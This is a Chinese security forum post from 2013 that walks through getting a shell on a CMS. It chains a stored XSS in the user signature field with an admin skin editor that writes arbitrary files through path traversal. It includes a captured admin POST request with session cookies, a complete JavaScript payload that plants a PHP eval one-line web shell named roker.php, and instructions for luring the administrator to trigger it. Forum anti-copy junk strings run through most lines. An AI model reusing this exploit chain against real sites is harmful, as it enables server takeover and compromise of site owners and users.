|
|
这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题
9 X. P9 W2 Q/ \& T/ ?官网已经修补了,所以重新下了源码 ^" g& I+ S4 k$ l# u; \1 G0 E/ e
因为 后台登入 还需要认证码 所以 注入就没看了。% M: L5 e9 R" w. j# F
存在 xss
* O; }: f% Z8 a4 s漏洞文件 user/member/skin_edit.php* Q5 }& t6 n9 Z
本帖隐藏的内容<tr><td style="height:130px;"><span class="t"><i>*</i>签名:
, G( f" a3 U- b V1 P1 y% V $ `- G- E$ z8 T/ f- c# J; _7 {9 k
</span><textarea style="width:435px;height:120px;" id="content" name="CS_Qianm"><?php echo $cscms_qianm?>3 o( w" x4 S& K7 R4 T5 t" }
7 X2 {$ z& S" ^" a
</textarea></td></tr>
9 U' f* s+ z# e& P) g' d+ m) _ $ Q: ^+ T, v% H7 ]& n5 \0 D
user/do.php
4 i& o0 m+ J! A* c4 J
: V c6 H: a7 k. m7 F
4 d9 v( a, q# tif($op=='zl'){ //资料
' m' N( k* \$ Z4 x/ c + O; C$ g3 I3 M4 y
if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email)) + H, J# @1 S7 A0 t
exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));6 K; w0 I. n: c( d% ]/ R. u' f _5 o
. z6 p# ~( U' ?0 M$ I6 m
$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."', ]( m' g0 O( Y- B
5 [6 g% s( ~- J, H# N: o" M
CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."' q5 f& C' J \/ ?. k8 j+ E
where CS_Name='".$cscms_name."'";
0 q0 J2 d3 L6 w; O% l) @
" Q8 e$ D0 s# {* F, R. Q if($db->query($sql)){; a" r% K& m. k, o* q! f7 o$ |
( A5 e" f; V% f, H7 h- X exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));6 g4 ~) g6 d$ T0 M. z& Y
- L: T- K- }, {8 d1 D) \0 y. S; ?* J }else{
4 N4 P5 s) ^+ N ! P+ ?2 o; ~5 z$ q9 T+ G/ G
exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));1 T7 j8 _3 | `% J9 f e: t
6 @/ l2 }6 A6 {# {
}( F) ~ w. G' I! J
9 i( I: d( s# C0 \! v
% a, S8 ?) I+ O, f没有 过滤导致xss产生。5 P9 J: U- m! k& A
后台 看了下 很奇葩的是可以写任意格式文件。。
n% q/ t: X0 ^) N! C! M5 ~0 f6 C抓包。。 z! n. B; M }3 _. ~- V4 c
2 J9 [' a$ L K% P% p
4 D- W# M" S; N& U7 D- O& q* n7 v
本帖隐藏的内容POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1' {, q& v7 J4 W1 S3 _
, Q9 |3 \* H* `( O) \4 Z, x( z
Accept: text/html, application/xhtml+xml, */*" a1 j. Y" z& [6 F3 }
1 _8 S* Z5 R" H4 o Y" A+ K
Referer: http://127.0.0.1/admin/skins/ski ... l/&name=aaa.php6 L! \" i: Q1 Y- Q+ D% X: D$ _: A
$ K3 ]4 a6 z0 @7 a3 p2 E; }Accept-Language: zh-CN( }0 R. z; V" r2 O4 y: {
% Q( z, j# N* |* N% b9 O2 Y
User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
R" {1 m/ c Z3 l$ u8 |% m# _9 ~ 5 X- {6 U {1 Y6 }8 [
Content-Type: application/x-www-form-urlencoded
: q2 ~6 |( a) L" D1 y * n8 A \& Y; y/ E' V+ ^$ g+ ~
Accept-Encoding: gzip, deflate
. u3 E Z" u1 o) z
9 s* f9 }: s0 e5 t3 OHost: 127.0.0.1# ~2 v$ G- g6 g3 j+ W
2 u9 l, b9 Q6 y7 JContent-Length: 38
- s7 p' n w( ?+ C* F$ Y 4 Z$ i9 j3 I9 e |
DNT: 1$ J; k( b4 o: M! ~; B% P0 l" i( d
! i* ] f7 s3 g5 j; L
Connection: Keep-Alive1 A% w2 ~6 r3 ?, g$ Q; G
6 r8 r; @$ M6 p" K3 U& A
Cache-Control: no-cache" g7 G Y# Q8 C9 d7 T6 ~; p1 ^
P& C( Q* y: [8 U& P2 n
Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594
+ B5 W+ v/ }& \2 F
* c8 h7 ^% H- u' s+ ~8 y a8 B6 {; L" C% C; I
name=aaa.php&content=%3Cs%3E%3Ca%25%3E8 x( b+ p* r: o9 N2 z
# b6 R2 S5 A9 Q* P' ~2 y
( }+ E4 O/ P1 C3 o& }' r( h4 ^. R$ D% V
于是 构造js如下。$ E! p9 U: N- z: ]9 j
/ e; o9 h4 N3 N本帖隐藏的内容<script>
3 ~0 [2 y I4 I7 c" |thisTHost = top.location.hostname;- i$ G* l5 R! }8 n4 ?% D4 J
. E$ h/ C( b0 C& N( Y
thisTHost = "http://" + thisTHost + "/admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/";
' x! {& O3 \: y5 n3 C7 \
% K8 p9 ^& Q0 R( ?' J; z8 jfunction PostSubmit(url, data, msg) {
2 f g5 Z V( h9 y" Q5 J* f var postUrl = url;, @7 e5 G# E$ o+ t# j( h( `: `
) l0 E0 M0 Q) q9 l. h3 `6 C var postData = data;
: i8 i' R* \0 I0 G; O var msgData = msg;
) ~" D1 w. _6 `7 `( P9 M# C var ExportForm = document.createElement("FORM");
; W( S0 t7 A2 f7 A+ b0 V( a0 \9 o document.body.appendChild(ExportForm); , C" B% n8 h, \& H& p2 o! ^* u
ExportForm.method = "POST";
3 Y' j3 q# y$ ^# G( ~ var newElement = document.createElement("input");
8 u0 }; V; A( N3 k: E+ e" }5 B6 Q newElement.setAttribute("name", "name"); 6 h3 C! E; ~! Y
newElement.setAttribute("type", "hidden"); 6 u/ b X# G& D1 b2 }. a# O* ?
var newElement2 = document.createElement("input");
6 _. u! J0 `7 A6 O. h# e newElement2.setAttribute("name", "content"); . }9 p* y- M) p, _! P( c; x
newElement2.setAttribute("type", "hidden");
, Y6 n' v; r0 p! G% a% x% k/ r" L0 @- n; r ExportForm.appendChild(newElement);
7 V) m8 g& {8 N: D* H0 z ExportForm.appendChild(newElement2);
# n; o$ f! j! x+ U9 Y, A" [ newElement.value = postData; ; m5 N+ S n: M* |, M
newElement2.value = msgData; : R7 w0 z2 |+ E& U
ExportForm.action = postUrl; . {7 D5 I; ]6 _: I' Z
ExportForm.submit(); 8 h* y* U8 I% E( ~! g* _6 j
};
7 H* t4 @3 N9 U+ ]- E 4 R4 e6 G$ U" R8 X
PostSubmit(thisTHost,"roker.php","<?php @eval($_POST[123]);?>");
{# B4 i; z: l$ Y' `. e# u : N L x- }' F
</script>; n' ~; `% n L+ W! A& d$ A5 }0 \
/ e0 ?9 t( T) x% a
7 h: u1 {: V" i B& w' J4 G/ C+ V9 A0 C+ @1 E$ Q: m5 n( Q6 y4 ]( J
http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入) W) R' K0 C- g8 ]2 u8 f9 A j
用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)) O- e/ E+ Y: }' U
就会 在 skins\index\html\目录下生成 roker.php 一句话。 |
' A" Z/ \% O+ k |
|
发表于 2013-11-6 18:09:37
收藏
分享
支持
反对